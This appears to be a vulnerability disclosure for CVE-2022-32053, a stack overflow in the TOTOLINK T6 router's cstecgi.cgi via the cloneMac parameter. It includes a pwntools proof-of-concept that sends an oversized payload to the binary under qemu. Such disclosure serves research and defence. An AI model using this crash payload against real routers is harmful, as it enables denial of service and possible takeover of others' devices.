Headline
CVE-2022-32053: IoT-vuln/Totolink/T6-v2/6.setWizardCfg at main · d1tto/IoT-vuln
TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the cloneMac parameter in the function FUN_0041621c.
The vulnerability exists in the router’s WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041621c (at address 0x41621c) gets the JSON parameter cloneMac, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:
When parameter proto is equal to 1, program will enter the danger if branch at line 125. Then the program gets the parameter cloneMac, splits it, and connects the segmented string to local variables in the stack without checking its length.
from pwn import * import json
data = { "topicurl": "setting/setWizardCfg", "proto": "1", "cloneMac": "A"*0x400 + “:” + “A” }
data = json.dumps(data) print(data)
argv = [ "qemu-mipsel-static", "-g", "1234", "-L", "./root/", "-E", "CONTENT_LENGTH={}".format(len(data)), "-E", "REMOTE_ADDR=192.168.2.1", “./cstecgi.cgi” ]
a = process(argv=argv) a.sendline(data.encode())
a.interactive()